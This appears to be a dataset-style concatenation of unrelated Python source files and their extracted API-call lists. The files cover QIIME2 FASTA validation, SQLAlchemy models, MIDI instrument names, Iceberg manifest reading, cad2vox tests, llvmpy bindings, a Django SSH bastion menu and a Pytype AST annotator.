(['"""[ACGTURYKMSWBDHVNacgturykmswbdhvn\\\\-\\\\. ]+\\\\r?\\\\n?"""'], {}), "('[ACGTURYKMSWBDHVNacgturykmswbdhvn\\\\-\\\\. ]+\\\\r?\\\\n?')\n", (1700, 1754), False, 'import re\n'), ((655, 684), 'qiime2.plugin.model.ValidationError', 'model.ValidationError', (['md_exc'], {}), '(md_exc)\n', (676, 684), True, 'import qiime2.plugin.model as model\n'), ((2496, 2604), 'qiime2.plugin.ValidationError', 'ValidationError', (['"""First line of file is not a valid description. Descriptions must start with \'>\'"""'], {}), '(\n "First line of file is not a valid description. Descriptions must start with \'>\'"\n )\n', (2511, 2604), False, 'from qiime2.plugin import ValidationError\n'), ((4850, 4916), 'qiime2.plugin.ValidationError', 'ValidationError', (['f"""utf-8 cannot decode byte on line {line_number}"""'], {}), "(f'utf-8 cannot decode byte on line {line_number}')\n", (4865, 4916), False, 'from qiime2.plugin import ValidationError\n'), ((4194, 4231), 're.fullmatch', 're.fullmatch', (['FASTADNAValidator', 'line'], {}), '(FASTADNAValidator, line)\n', (4206, 4231), False, 'import re\n'), ((3067, 3162), 'qiime2.plugin.ValidationError', 'ValidationError', (['f"""Multiple consecutive descriptions starting on line {line_number - 1!r}"""'], {}), "(\n f'Multiple consecutive descriptions starting on line {line_number - 1!r}')\n", (3082, 3162), False, 'from qiime2.plugin import ValidationError\n'), ((3903, 4010), 'qiime2.plugin.ValidationError', 'ValidationError', (['f"""ID on line {line_number} is a duplicate of another ID on line {ids[line[0]]}."""'], {}), "(\n f'ID on line {line_number} is a duplicate of another ID on line {ids[line[0]]}.'\n )\n", (3918, 4010), False, 'from qiime2.plugin import ValidationError\n'), ((3434, 3505), 'qiime2.plugin.ValidationError', 'ValidationError', (['f"""Description on line {line_number} is missing an ID."""'], {}), "(f'Description on line {line_number} is missing an ID.')\n", (3449, 3505), False, 'from qiime2.plugin import ValidationError\n'), ((3654, 3759), 'qiime2.plugin.ValidationError', 'ValidationError', (['f"""ID on line {line_number} starts with a space. IDs may not start with spaces"""'], {}), "(\n f'ID on line {line_number} starts with a space. IDs may not start with spaces'\n )\n", (3669, 3759), False, 'from qiime2.plugin import ValidationError\n'), ((4477, 4637), 'qiime2.plugin.ValidationError', 'ValidationError', (['f"""Invalid character \'{character}\' at position {position} on line {line_number} (does not match IUPAC characters for a DNA sequence)."""'], {}), '(\n f"Invalid character \'{character}\' at position {position} on line {line_number} (does not match IUPAC characters for a DNA sequence)."\n )\n', (4492, 4637), False, 'from qiime2.plugin import ValidationError\n')]
|
"""
** Copyright 2021 Bloomberg Finance L.P.
**
** Licensed under the Apache License, Version 2.0 (the "License");
** you may not use this file except in compliance with the License.
** You may obtain a copy of the License at
**
** http://www.apache.org/licenses/LICENSE-2.0
**
** Unless required by applicable law or agreed to in writing, software
** distributed under the License is distributed on an "AS IS" BASIS,
** WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
** See the License for the specific language governing permissions and
** limitations under the License.
"""
from sqlalchemy import JSON, Column, ForeignKey, String
from sqlalchemy.orm import declarative_base
from sqlalchemy.sql.sqltypes import BigInteger
from ._query_metrics import InitialQueryMetrics
Base = declarative_base()
class _OperatorSummariesInitial:
id = Column("id", BigInteger, autoincrement=True, primary_key=True)
operatorSummary = Column("operatorSummary", JSON(none_as_null=True), nullable=False)
class OperatorSummariesInitial(Base, _OperatorSummariesInitial):
__tablename__ = "operator_summaries"
queryId = Column("queryId", String(100), ForeignKey(InitialQueryMetrics.queryId), primary_key=True)
__table_args__ = {"extend_existing": True, "schema": "raw_metrics"}
|
[
"sqlalchemy.orm.declarative_base",
"sqlalchemy.ForeignKey",
"sqlalchemy.Column",
"sqlalchemy.String",
"sqlalchemy.JSON"
] |
[((826, 844), 'sqlalchemy.orm.declarative_base', 'declarative_base', ([], {}), '()\n', (842, 844), False, 'from sqlalchemy.orm import declarative_base\n'), ((890, 952), 'sqlalchemy.Column', 'Column', (['"""id"""', 'BigInteger'], {'autoincrement': '(True)', 'primary_key': '(True)'}), "('id', BigInteger, autoincrement=True, primary_key=True)\n", (896, 952), False, 'from sqlalchemy import JSON, Column, ForeignKey, String\n'), ((1001, 1024), 'sqlalchemy.JSON', 'JSON', ([], {'none_as_null': '(True)'}), '(none_as_null=True)\n', (1005, 1024), False, 'from sqlalchemy import JSON, Column, ForeignKey, String\n'), ((1184, 1195), 'sqlalchemy.String', 'String', (['(100)'], {}), '(100)\n', (1190, 1195), False, 'from sqlalchemy import JSON, Column, ForeignKey, String\n'), ((1197, 1236), 'sqlalchemy.ForeignKey', 'ForeignKey', (['InitialQueryMetrics.queryId'], {}), '(InitialQueryMetrics.queryId)\n', (1207, 1236), False, 'from sqlalchemy import JSON, Column, ForeignKey, String\n')]
|
from collections import OrderedDict
instruments = OrderedDict()
instruments['Piano'] = ['Acoustic Grand Piano', 'Bright Acoustic Piano',
'Electric Grand Piano', 'Honky-tonk Piano', 'Electric Piano 1',
'Electric Piano 2', 'Harpsichord', 'Clavi',]
instruments['Chromatic Percussion'] = ['Celesta', 'Glockenspiel', 'Music Box',
'Vibraphone', 'Marimba', 'Xylophone', 'Tubular Bells', 'Dulcimer']
instruments['Organ'] = ['Drawbar Organ', 'Percussive Organ', 'Rock Organ',
'Church Organ', 'Reed Organ', 'Accordion', 'Harmonica', 'Tango Accordion']
instruments['Guitar'] = ['Acoustic Guitar (nylon)', 'Acoustic Guitar (steel)',
'Electric Guitar (jazz)', 'Electric Guitar (clean)', 'Electric Guitar (muted)',
'Overdriven Guitar', 'Distortion Guitar', 'Guitar Harmonics']
instruments['Bass'] = ['Acoustic Bass', 'Electric Bass (finger)',
'Electric Bass (pick)', 'Fretless Bass', 'Slap Bass 1', 'Slap Bass 2',
'Synth Bass 1', 'Synth Bass 2']
instruments['Strings'] = ['Violin', 'Viola', 'Cello', 'Contrabass',
'Tremolo Strings', 'Pizzicato Strings', 'Orchestral Harp', 'Timpani']
instruments['Ensemble'] = ['String Ensemble 1', 'String Ensemble 2',
'Synth Strings 1', 'Synth Strings 2', 'Choir Aahs', 'Choir Oohs', 'Synth Voice',
'Orchestra Hit']
instruments['Brass'] = ['Trumpet', 'Trombone', 'Tuba', 'Muted Trumpet',
'French Horn', 'Brass Section', 'Synth Brass 1', 'Synth Brass 2']
instruments['Reed'] = ['Soprano Sax', 'Alto Sax', 'Tenor Sax', 'Baritone Sax',
'Oboe', 'English Horn', 'Bassoon', 'Clarinet']
instruments['Pipe'] = ['Piccolo', 'Flute', 'Recorder', 'Pan Flute',
'Blown Bottle', 'Shakuhachi', 'Whistle', 'Ocarina']
instruments['Synth Lead'] = ['Lead 1 (square)', 'Lead 2 (sawtooth)',
'Lead 3 (calliope)', 'Lead 4 (chiff)', 'Lead 5 (charang)', 'Lead 6 (voice)',
'Lead 7 (fifths)', 'Lead 8 (bass + lead)']
instruments['Synth Pad'] = ['Pad 1 (new age)', 'Pad 2 (warm)',
'Pad 3 (polysynth)', 'Pad 4 (choir)', 'Pad 5 (bowed)', 'Pad 6 (metallic)',
'Pad 7 (halo)', 'Pad 8 (sweep)']
instruments['Synth Effects'] = ['FX 1 (rain)', 'FX 2 (soundtrack)',
'FX 3 (crystal)', 'FX 4 (atmosphere)', 'FX 5 (brightness)', 'FX 6 (goblins)',
'FX 7 (echoes)', 'FX 8 (sci-fi)']
instruments['World'] = ['Sitar', 'Banjo', 'Shamisen', 'Koto', 'Kalimba',
'Bag pipe', 'Fiddle', 'Shanai']
instruments['Percussion'] = ['Tinkle Bell', 'Agogo', 'Steel Drums', 'Woodblock',
'Taiko Drum', 'Melodic Tom', 'Synth Drum', 'Reverse Cymbal']
instruments['Sound Effects'] = ['Guitar Fret Noise', 'Breath Noise', 'Seashore',
'Bird Tweet', 'Telephone Ring', 'Helicopter', 'Applause', 'Gunshot']
|
[
"collections.OrderedDict"
] |
[((51, 64), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (62, 64), False, 'from collections import OrderedDict\n')]
|
#!/usr/bin/env python
# encoding=utf-8
"""
Copyright (c) 2021 Huawei Technologies Co.,Ltd.
openGauss is licensed under Mulan PSL v2.
You can use this software according to the terms and conditions of the Mulan PSL v2.
You may obtain a copy of Mulan PSL v2 at:
http://license.coscl.org.cn/MulanPSL2
THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OF ANY KIND,
EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT,
MERCHANTABILITY OR FIT FOR A PARTICULAR PURPOSE.
See the Mulan PSL v2 for more details.
"""
from yat.test.inject import RandomTestCase
from yat.test.inject import RandomInject
from yat.test.inject.decorator import order
class TestRandom(RandomTestCase):
def test_001(self):
pass
@order(index=1)
def test_002(self):
pass
def test_abc(self):
pass
def inject_001(self):
pass
def inject_002(self):
pass
def inject_003(self):
pass
def check_001(self):
pass
def check_002(self):
pass
@order(index=1)
def check_003(self):
pass
node = object()
inject = RandomInject(node)
functions = inject.run(TestRandom())
print(functions)
|
[
"yat.test.inject.RandomInject",
"yat.test.inject.decorator.order"
] |
[((1138, 1156), 'yat.test.inject.RandomInject', 'RandomInject', (['node'], {}), '(node)\n', (1150, 1156), False, 'from yat.test.inject import RandomInject\n'), ((764, 778), 'yat.test.inject.decorator.order', 'order', ([], {'index': '(1)'}), '(index=1)\n', (769, 778), False, 'from yat.test.inject.decorator import order\n'), ((1058, 1072), 'yat.test.inject.decorator.order', 'order', ([], {'index': '(1)'}), '(index=1)\n', (1063, 1072), False, 'from yat.test.inject.decorator import order\n')]
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import fastavro
from iceberg.api import FileFormat, Filterable
from iceberg.api.expressions import Expressions
from iceberg.api.io import CloseableGroup
from .avro import AvroToIceberg
from .manifest_entry import ManifestEntry, Status
from .partition_spec_parser import PartitionSpecParser
from .schema_parser import SchemaParser
from .table_metadata import TableMetadata
class ManifestReader(CloseableGroup, Filterable):
ALL_COLUMNS = ["*"]
CHANGE_COLUMNS = ["file_path", "file_format", "partition", "record_count", "file_size_in_bytes"]
@staticmethod
def read(file):
return ManifestReader(file=file)
def select(self, columns):
raise NotImplementedError()
def filter_partitions(self, expr):
raise NotImplementedError()
def filter_rows(self, expr):
raise NotImplementedError()
@staticmethod
def in_memory(spec, entries):
return ManifestReader(spec=spec, entries=entries)
def __init__(self, file=None, spec=None, entries=None):
self.file = file
self.schema = None
self.metadata = None
self.spec = spec
self._entries = entries
if self.file is not None:
self.__init_from_file()
else:
self.__init_from_spec()
def __init_from_file(self):
try:
with self.file.new_fo() as fo:
avro_reader = fastavro.reader(fo)
self.metadata = avro_reader.metadata
except Exception as e:
raise e
self.schema = SchemaParser.from_json(self.metadata.get("schema"))
spec_id = int(self.metadata.get("partition-spec-id", TableMetadata.INITIAL_SPEC_ID))
self.spec = PartitionSpecParser.from_json_fields(self.schema, spec_id, self.metadata.get("partition-spec"))
def __init_from_spec(self):
self.metadata = dict()
self.schema = self.spec.schema
def entries(self, columns=None):
if columns is None:
columns = ManifestReader.ALL_COLUMNS
format = FileFormat.from_file_name(self.file.location())
if format is None:
raise RuntimeError("Unable to determine format of manifest: " + self.file)
proj_schema = ManifestEntry.project_schema(self.spec.partition_type(), columns)
read_entries = list()
if format == FileFormat.AVRO:
with self.file.new_fo() as fo:
avro_reader = fastavro.reader(fo)
for read_entry in AvroToIceberg.read_avro_row(proj_schema, avro_reader):
entry = ManifestEntry(schema=proj_schema, partition_type=self.spec.partition_type())
for i, key in enumerate(read_entry.keys()):
entry.put(i, read_entry[key])
read_entries.append(entry)
else:
raise RuntimeError("Invalid format for manifest file: " + format)
return read_entries
def iterator(self, part_filter=None, columns=None):
if part_filter is None and columns is None:
return self.iterator(Expressions.always_true(), Filterable.ALL_COLUMNS)
return (entry.file for entry in self.entries if entry.status != Status.DELETED)
|
[
"fastavro.reader",
"iceberg.api.expressions.Expressions.always_true"
] |
[((2179, 2198), 'fastavro.reader', 'fastavro.reader', (['fo'], {}), '(fo)\n', (2194, 2198), False, 'import fastavro\n'), ((3215, 3234), 'fastavro.reader', 'fastavro.reader', (['fo'], {}), '(fo)\n', (3230, 3234), False, 'import fastavro\n'), ((3858, 3883), 'iceberg.api.expressions.Expressions.always_true', 'Expressions.always_true', ([], {}), '()\n', (3881, 3883), False, 'from iceberg.api.expressions import Expressions\n')]
|
""" Various sanity tests to check that filenames are handled corectly."""
import pytest
import cad2vox
import os
# use the test case folder as their working directory
@pytest.fixture(autouse=True)
def change_test_dir(request, monkeypatch):
monkeypatch.chdir(request.fspath.dirname)
@pytest.fixture()
def cleanup():
print("Starting Pytest")
yield
print("performing cleanup of output")
if os.path.exists("greyscale.csv"):
os.remove("greyscale.csv")
############ tests for unit length
@pytest.mark.parametrize("input_length",[5,"max","0.012",-0.00001])
def test_invalid_unit_length(input_length):
# Test -ve or non-float values gives error
with pytest.raises(TypeError):
cad2vox.voxelise("inputs/AMAZE_Sample.med","outputs/AMAZE_Sample.tiff",unit_length=input_length)
assert TypeError
@pytest.mark.parametrize("gridsize",[-5,"max","0.012",0.00001])
def test_invalid_gridsize(gridsize):
# Test negative or non int value for gridsize gives error
with pytest.raises(TypeError):
cad2vox.voxelise("inputs/AMAZE_Sample.med","outputs/AMAZE_Sample.tiff",gridsize=gridsize)
assert TypeError
def test_set_both():
# Test negative or non int value for gridsize gives error
with pytest.raises(TypeError):
cad2vox.voxelise("inputs/AMAZE_Sample.med","outputs/AMAZE_Sample.tiff",gridsize=100,unit_length=0.0001)
assert TypeError
|
[
"os.remove",
"pytest.fixture",
"os.path.exists",
"pytest.raises",
"pytest.mark.parametrize",
"cad2vox.voxelise"
] |
[((169, 197), 'pytest.fixture', 'pytest.fixture', ([], {'autouse': '(True)'}), '(autouse=True)\n', (183, 197), False, 'import pytest\n'), ((289, 305), 'pytest.fixture', 'pytest.fixture', ([], {}), '()\n', (303, 305), False, 'import pytest\n'), ((515, 583), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""input_length"""', "[5, 'max', '0.012', -1e-05]"], {}), "('input_length', [5, 'max', '0.012', -1e-05])\n", (538, 583), False, 'import pytest\n'), ((836, 900), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""gridsize"""', "[-5, 'max', '0.012', 1e-05]"], {}), "('gridsize', [-5, 'max', '0.012', 1e-05])\n", (859, 900), False, 'import pytest\n'), ((409, 440), 'os.path.exists', 'os.path.exists', (['"""greyscale.csv"""'], {}), "('greyscale.csv')\n", (423, 440), False, 'import os\n'), ((450, 476), 'os.remove', 'os.remove', (['"""greyscale.csv"""'], {}), "('greyscale.csv')\n", (459, 476), False, 'import os\n'), ((682, 706), 'pytest.raises', 'pytest.raises', (['TypeError'], {}), '(TypeError)\n', (695, 706), False, 'import pytest\n'), ((716, 818), 'cad2vox.voxelise', 'cad2vox.voxelise', (['"""inputs/AMAZE_Sample.med"""', '"""outputs/AMAZE_Sample.tiff"""'], {'unit_length': 'input_length'}), "('inputs/AMAZE_Sample.med', 'outputs/AMAZE_Sample.tiff',\n unit_length=input_length)\n", (732, 818), False, 'import cad2vox\n'), ((1007, 1031), 'pytest.raises', 'pytest.raises', (['TypeError'], {}), '(TypeError)\n', (1020, 1031), False, 'import pytest\n'), ((1041, 1136), 'cad2vox.voxelise', 'cad2vox.voxelise', (['"""inputs/AMAZE_Sample.med"""', '"""outputs/AMAZE_Sample.tiff"""'], {'gridsize': 'gridsize'}), "('inputs/AMAZE_Sample.med', 'outputs/AMAZE_Sample.tiff',\n gridsize=gridsize)\n", (1057, 1136), False, 'import cad2vox\n'), ((1245, 1269), 'pytest.raises', 'pytest.raises', (['TypeError'], {}), '(TypeError)\n', (1258, 1269), False, 'import pytest\n'), ((1279, 1389), 'cad2vox.voxelise', 'cad2vox.voxelise', (['"""inputs/AMAZE_Sample.med"""', '"""outputs/AMAZE_Sample.tiff"""'], {'gridsize': '(100)', 'unit_length': '(0.0001)'}), "('inputs/AMAZE_Sample.med', 'outputs/AMAZE_Sample.tiff',\n gridsize=100, unit_length=0.0001)\n", (1295, 1389), False, 'import cad2vox\n')]
|
from binding import *
from .namespace import llvm
from .Pass import ImmutablePass
DataLayout = llvm.Class(ImmutablePass)
StructLayout = llvm.Class()
from .LLVMContext import LLVMContext
from .ADT.StringRef import StringRef
from .Module import Module
from .Type import Type, IntegerType, StructType
from .ADT.SmallVector import SmallVector_Value
from .GlobalVariable import GlobalVariable
@DataLayout
class DataLayout:
_include_ = 'llvm/DataLayout.h'
_new_string = Constructor(cast(str, StringRef))
_new_module = Constructor(ptr(Module))
@CustomPythonStaticMethod
def new(arg):
if isinstance(arg, Module):
return DataLayout._new_module(arg)
else:
return DataLayout._new_string(arg)
isLittleEndian = Method(cast(Bool, bool))
isBigEndian = Method(cast(Bool, bool))
getStringRepresentation = Method(cast(StdString, str))
@CustomPythonMethod
def __str__(self):
return self.getStringRepresentation()
isLegalInteger = Method(cast(Bool, bool), cast(int, Unsigned))
isIllegalInteger = Method(cast(Bool, bool), cast(int, Unsigned))
exceedsNaturalStackAlignment = Method(cast(Bool, bool), cast(int, Unsigned))
fitsInLegalInteger = Method(cast(Bool, bool), cast(int, Unsigned))
getPointerABIAlignment = Method(cast(Unsigned, int),
cast(int, Unsigned)).require_only(0)
getPointerPrefAlignment = Method(cast(Unsigned, int),
cast(int, Unsigned)).require_only(0)
getPointerSize = Method(cast(Unsigned, int),
cast(int, Unsigned)).require_only(0)
getPointerSizeInBits = Method(cast(Unsigned, int),
cast(int, Unsigned)).require_only(0)
getTypeSizeInBits = Method(cast(Uint64, int), ptr(Type))
getTypeStoreSize = Method(cast(Uint64, int), ptr(Type))
getTypeStoreSizeInBits = Method(cast(Uint64, int), ptr(Type))
getTypeAllocSize = Method(cast(Uint64, int), ptr(Type))
getTypeAllocSizeInBits = Method(cast(Uint64, int), ptr(Type))
getABITypeAlignment = Method(cast(Unsigned, int), ptr(Type))
getABIIntegerTypeAlignment = Method(cast(Unsigned, int), cast(int, Unsigned))
getCallFrameTypeAlignment = Method(cast(Unsigned, int), ptr(Type))
getPrefTypeAlignment = Method(cast(Unsigned, int), ptr(Type))
getPreferredTypeAlignmentShift = Method(cast(Unsigned, int), ptr(Type))
_getIntPtrType = Method(ptr(IntegerType),
ref(LLVMContext), cast(int, Unsigned))
_getIntPtrType.require_only(1)
_getIntPtrType.realname = 'getIntPtrType'
_getIntPtrType2 = Method(ptr(Type), ptr(Type))
_getIntPtrType2.realname = 'getIntPtrType'
@CustomPythonMethod
def getIntPtrType(self, *args):
if isinstance(args[0], LLVMContext):
return self._getIntPtrType(*args)
else:
return self._getIntPtrType(*args)
_getIndexedOffset = Method(cast(Uint64, int), ptr(Type),
ref(SmallVector_Value))
_getIndexedOffset.realname = 'getIndexedOffset'
@CustomPythonMethod
def getIndexedOffset(self, *args):
from llvmpy import extra
args = list(args)
args[1] = extra.make_small_vector_from_values(args[1])
return self.getIndexedOffset(*args)
getStructLayout = Method(const(ptr(StructLayout)), ptr(StructType))
getPreferredAlignment = Method(cast(Unsigned, int), ptr(GlobalVariable))
getPreferredAlignmentLog = Method(cast(Unsigned, int), ptr(GlobalVariable))
@StructLayout
class StructLayout:
getSizeInBytes = Method(cast(Uint64, int))
getSizeInBits = Method(cast(Uint64, int))
getAlignment = Method(cast(Unsigned, int))
getElementContainingOffset = Method(cast(Unsigned, int), cast(int, Uint64))
getElementOffset = Method(cast(Uint64, int), cast(int, Unsigned))
getElementOffsetInBits = Method(cast(Uint64, int), cast(int, Unsigned))
|
[
"llvmpy.extra.make_small_vector_from_values"
] |
[((3274, 3318), 'llvmpy.extra.make_small_vector_from_values', 'extra.make_small_vector_from_values', (['args[1]'], {}), '(args[1])\n', (3309, 3318), False, 'from llvmpy import extra\n')]
|
from django.contrib.auth import authenticate
from backend import paramiko_ssh
from web import models
class SshHandler(object):
"""堡垒机交互脚本"""
def __init__(self,argv_handler_instance):
self.argv_handler_instance = argv_handler_instance
self.models = models
def auth(self):
"""认证程序"""
count = 0
while count < 3:
username = input("堡垒机账号:").strip()
password = input("Password:").strip()
user = authenticate(username=username,password=password)
if user:
self.user = user
return True
else:
count +=1
def interactive(self):
"""启动交互脚本"""
if self.auth():
print("Ready to print all the authorized hosts...to this user ...")
while True:
host_group_list = self.user.host_groups.all()
for index,host_group_obj in enumerate(host_group_list):
print("%s.\t%s[%s]"%(index,host_group_obj.name, host_group_obj.host_to_remote_users.count()))
print("z.\t未分组主机[%s]" % (self.user.host_to_remote_users.count()))
choice = input("请选择主机组>>:").strip()
if choice.isdigit():
choice = int(choice)
selected_host_group = host_group_list[choice]
elif choice == 'z':
selected_host_group = self.user
while True:
for index,host_to_user_obj in enumerate(selected_host_group.host_to_remote_users.all()):
print("%s.\t%s" % (index, host_to_user_obj))
choice = input("请选择主机>>:").strip()
if choice.isdigit():
choice = int(choice)
selected_host_to_user_obj = selected_host_group.host_to_remote_users.all()[choice]
print("going to logon %s" % selected_host_to_user_obj )
paramiko_ssh.ssh_connect(self, selected_host_to_user_obj )
if choice == "b":
break
|
[
"backend.paramiko_ssh.ssh_connect",
"django.contrib.auth.authenticate"
] |
[((479, 529), 'django.contrib.auth.authenticate', 'authenticate', ([], {'username': 'username', 'password': 'password'}), '(username=username, password=password)\n', (491, 529), False, 'from django.contrib.auth import authenticate\n'), ((2010, 2067), 'backend.paramiko_ssh.ssh_connect', 'paramiko_ssh.ssh_connect', (['self', 'selected_host_to_user_obj'], {}), '(self, selected_host_to_user_obj)\n', (2034, 2067), False, 'from backend import paramiko_ssh\n')]
|
"""Library to take a Python AST and add Pytype type information to it."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
from pytype import analyze
from pytype import errors
from pytype import io
from pytype import load_pytd
from pytype.pyc import opcodes
from pytype.pytd import pytd_utils
_NAME_LOAD_OPS = {
opcodes.LOAD_GLOBAL, opcodes.LOAD_FAST, opcodes.LOAD_NAME,
opcodes.LOAD_DEREF
}
_NAME_STORE_OPS = {
opcodes.STORE_GLOBAL, opcodes.STORE_FAST, opcodes.STORE_NAME,
opcodes.STORE_DEREF
}
def annotate_source(source, ast_factory, pytype_options, filename="src.py"):
"""Infer types for `source`, and return an AST of it with types added.
Args:
source: Text, the source code to type-infer and parse to an AST.
ast_factory: Callable[[Options], ast-module-like], a callable that takes the
Pytype options and returns an ast-module like object used to parse the
source to an AST and traverse the created ast.Module object.
pytype_options: pytype.config.Options, the options to pass onto Pytype.
filename: Text, the logical file path the source came from, if any. This
file won't be read.
Returns:
The created Module object from what `ast_factory` returned.
"""
traces = infer_types(source, filename, pytype_options)
ast_module = ast_factory(pytype_options)
module = ast_module.parse(source, filename)
visitor = AnnotateAstVisitor(ast_module, traces)
visitor.visit(module)
return module
def infer_types(source, filename, options):
"""Infer types for the provided source.
Args:
source: Text, the source code to analyze.
filename: Text, the filename the source came from. The file won't be read.
options: pytype.config.Options, the options to pass onto Pytype.
Returns:
Traces object with information gathered by Pytype.
"""
errorlog = errors.ErrorLog()
loader = load_pytd.create_loader(options)
vm = analyze.CallTracer(
errorlog=errorlog,
options=options,
generate_unknowns=options.protocols,
loader=loader)
with io.wrap_pytype_exceptions(PytypeError, filename=filename):
analyze.infer_types(
src=source,
filename=filename,
errorlog=errorlog,
options=options,
loader=loader,
show_library_calls=True,
tracer_vm=vm)
return Traces(vm)
class Traces(object):
"""Collection of Pytype's type inference info."""
def __init__(self, vm):
"""Creates an instance.
Args:
vm: analyze.CallTracer, VM with all the information gathered by Pytype.
"""
# The vm object has to be kept alive, otherwise the objects in opcode_traces
# cause a segfault.
self._vm = vm
self._ops_by_line = collections.defaultdict(list)
for op, symbol, type_defs in vm.opcode_traces:
trace_entry = Trace(op, symbol, type_defs)
self._ops_by_line[trace_entry.op.line].append(trace_entry)
def find_unassociated_traces(self, line_num, op_types, symbol):
"""Finds `Trace` objects that haven't been associated to an AST node.
Args:
line_num: int, the line number that the traces must be for.
op_types: Iterable[Type[pyc.opcodes.Opcode]], the types that any opcodes
matching `line_num` must also be an instance of.
symbol: Text, the trace symbol name that must also match.
Returns:
Sequence[Trace] of matching Traces.
"""
op_types = tuple(op_types)
entries = self._ops_by_line[line_num]
ops = []
for entry in entries:
if entry.associated:
continue
if not isinstance(entry.op, op_types):
continue
if entry.symbol != symbol:
continue
ops.append(entry)
return ops
class Trace(object):
"""Pytype trace information.
Attributes:
associated: bool, True if this trace has been associated with an AST node,
False if not.
"""
def __init__(self, op, symbol, type_defs):
self._op = op
self._symbol = symbol
self._type_def = _join_type_defs(type_defs)
self._type_def_annotation = _annotation_str_from_type_def(self.type_def)
self.associated = False
@property
def op(self):
"""Returns opcode.Opcode of the trace opcode."""
return self._op
@property
def symbol(self):
"""Returns Optional[Text] of the symbol name."""
return self._symbol
@property
def type_def(self):
"""Returns Optional[abstract.AtomicAbstractValue] of the Pytype type info."""
return self._type_def
@property
def type_def_annotation(self):
"""Returns Text version of `.type_def`."""
return self._type_def_annotation
class AnnotateAstVisitor(object):
"""Traverses an AST and sets type information on its nodes.
This is modeled after ast.NodeVisitor, but doesn't inherit from it because
it is ast-module agnostic so that different AST implementations can be used.
"""
def __init__(self, ast, traces):
"""Creates an instance.
Args:
ast: An ast-module-like used to traverse AST node.
traces: Traces object of Pytype trace information.
"""
self._ast = ast
self._traces = traces
def visit(self, node):
visitor = getattr(self, "visit_" + node.__class__.__name__,
self.generic_visit)
return visitor(node)
def generic_visit(self, node):
for child in self._ast.iter_child_nodes(node):
self.visit(child)
def visit_Assign(self, node): # pylint: disable=invalid-name
"""Visits an `Assign` node."""
# This changes the visit order of Assign nodes from [targets, value]
# to [value, targets] to better match the opcode order.
self.visit(node.value)
for child in node.targets:
self.visit(child)
def visit_Name(self, node): # pylint: disable=invalid-name
"""Visits a `Name` node."""
if isinstance(node.ctx, self._ast.Del):
return
ctx = node.ctx
if isinstance(ctx, self._ast.Load):
op_types = _NAME_LOAD_OPS
elif isinstance(ctx, self._ast.Store):
op_types = _NAME_STORE_OPS
else:
raise ValueError("Unsupported Name.ctx: {}".format(node.ctx))
ops = self._traces.find_unassociated_traces(node.lineno, op_types, node.id)
# For lack of a better option, take the first one.
entry = next(iter(ops), None)
self._maybe_set_type(node, entry)
def _maybe_set_type(self, node, trace):
"""Sets type information on the node, if there is any to set."""
if not trace:
return
if trace:
node.resolved_type = trace.type_def
node.resolved_annotation = trace.type_def_annotation
trace.associated = True
class PytypeError(Exception):
"""Wrap exceptions raised by Pytype."""
def _join_type_defs(type_defs):
return pytd_utils.JoinTypes(v.to_type() for v in type_defs if v)
def _annotation_str_from_type_def(type_def):
if not type_def:
return "Any"
else:
return pytd_utils.Print(type_def)
|
[
"pytype.analyze.CallTracer",
"pytype.analyze.infer_types",
"collections.defaultdict",
"pytype.io.wrap_pytype_exceptions",
"pytype.pytd.pytd_utils.Print",
"pytype.errors.ErrorLog",
"pytype.load_pytd.create_loader"
] |
[((1928, 1945), 'pytype.errors.ErrorLog', 'errors.ErrorLog', ([], {}), '()\n', (1943, 1945), False, 'from pytype import errors\n'), ((1957, 1989), 'pytype.load_pytd.create_loader', 'load_pytd.create_loader', (['options'], {}), '(options)\n', (1980, 1989), False, 'from pytype import load_pytd\n'), ((1998, 2109), 'pytype.analyze.CallTracer', 'analyze.CallTracer', ([], {'errorlog': 'errorlog', 'options': 'options', 'generate_unknowns': 'options.protocols', 'loader': 'loader'}), '(errorlog=errorlog, options=options, generate_unknowns=\n options.protocols, loader=loader)\n', (2016, 2109), False, 'from pytype import analyze\n'), ((2138, 2195), 'pytype.io.wrap_pytype_exceptions', 'io.wrap_pytype_exceptions', (['PytypeError'], {'filename': 'filename'}), '(PytypeError, filename=filename)\n', (2163, 2195), False, 'from pytype import io\n'), ((2201, 2345), 'pytype.analyze.infer_types', 'analyze.infer_types', ([], {'src': 'source', 'filename': 'filename', 'errorlog': 'errorlog', 'options': 'options', 'loader': 'loader', 'show_library_calls': '(True)', 'tracer_vm': 'vm'}), '(src=source, filename=filename, errorlog=errorlog,\n options=options, loader=loader, show_library_calls=True, tracer_vm=vm)\n', (2220, 2345), False, 'from pytype import analyze\n'), ((2795, 2824), 'collections.defaultdict', 'collections.defaultdict', (['list'], {}), '(list)\n', (2818, 2824), False, 'import collections\n'), ((6938, 6964), 'pytype.pytd.pytd_utils.Print', 'pytd_utils.Print', (['type_def'], {}), '(type_def)\n', (6954, 6964), False, 'from pytype.pytd import pytd_utils\n')]
|
from django.contrib import admin
from app import models
# Register your models here.
admin.site.register(models.Post)
admin.site.register(models.Comment)
admin.site.register(models.Profile)
|
[
"django.contrib.admin.site.register"
] |
[((85, 117), 'django.contrib.admin.site.register', 'admin.site.register', (['models.Post'], {}), '(models.Post)\n', (104, 117), False, 'from django.contrib import admin\n'), ((118, 153), 'django.contrib.admin.site.register', 'admin.site.register', (['models.Comment'], {}), '(models.Comment)\n', (137, 153), False, 'from django.contrib import admin\n'), ((154, 189), 'django.contrib.admin.site.register', 'admin.site.register', (['models.Profile'], {}), '(models.Profile)\n', (173, 189), False, 'from django.contrib import admin\n')]
|
#!/usr/bin/env python3
"""
Author : <NAME>
Date : 2021-01-15
